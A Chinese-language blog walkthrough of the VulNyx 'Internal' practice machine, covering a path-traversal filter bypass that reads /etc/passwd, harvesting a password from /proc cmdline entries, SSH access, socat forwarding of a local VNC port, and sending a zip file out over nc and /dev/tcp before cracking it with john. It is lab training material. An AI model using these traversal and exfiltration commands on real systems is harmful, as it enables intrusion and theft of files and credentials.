VulNyx - Internal


image
扫描发现有三个端口





image
basic验证需要用户名密码登录



访问80端口
\URLFinder 发现有个internal的php文件
image




看看有无任意文件读取漏洞
image
发现没有回显 但是总感觉怪怪的 应该是有啥东西 因为他这里的出现了pre 标签也许他是过滤了../ 我们改成....//试试
image
真的读取到了




通过读取passwd发现有个admin用户
admin:x:1000:1000:admin,,,:/home/admin:/bin/bash
在爆破9999端口basic验证无效之后 其实就不知道咋搞了




看wp学习到我们可以利用proc文件夹来读取更多的信息
可以看这篇文章proc

cat /proc/【pid】/cmdline 可以读取到当前进程是在执行什么
例如
image
就可以看到 pid为1的进程在执行 initsplash



我们利用这一点直接爆破
image
image
发现basic的密码了
image
登录成功 但是没发现啥东西
除此之外我们还发现了一个有趣的端口5901 这是vnc的端口
image




尝试一下用同样的密码能否ssh登录
image
登录成功



ss -al 查看所有socket监听端口
发现了这个5901的端口 这个端口可以vnc登录 但是他绑定了本机也就是说他只允许本地地址访问
image

我们需要将他的端口转发出来让内网的kali也就是我们的攻击机能访问得到 这就需要端口转发的工具socat



先wget 一下socatx64.bin
然后
./socatx64.bin TCP-LISTEN:5900,fork TCP4:192.168.200.246:5901&
将端口5901转发到端口5900
再来ss -la查看一下我们看到5900前面是0.0.0.0也就是说其他主机也可以访问了不再局限于本机ip
image



那么接下来我们要看看如何登录vnc了
image
vnc登录需要一个passwd的文件
这里挺阴险的他有个隐藏文件...
image
cd ...就能看到passwd文件了



是个zip
image
解压需要密码
image



将这个文件传给kali
用nc传输
kali:nc -lp 10888 > a.zip
靶机:cat internalkey.zip > /dev/tcp/192.168.200.101/10888



将zip转化为hash以便爆破密码zip2john a.zip> tmp
再用john爆破Miami john tmp --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt
但是发现爆破不出来



猜测还是之前那个basic的密码
解压成功
image

接下来直接用vncviwer就OK了
vncviewer 192.168.200.246:5900 -passwd passwd

但是我不知道除了啥问题总是说vncviewer: VNC server closed connection 反正总体思路就是这样

posted @ 2024-08-30 00:20  WSssSW  阅读(6)  评论(0编辑  收藏  举报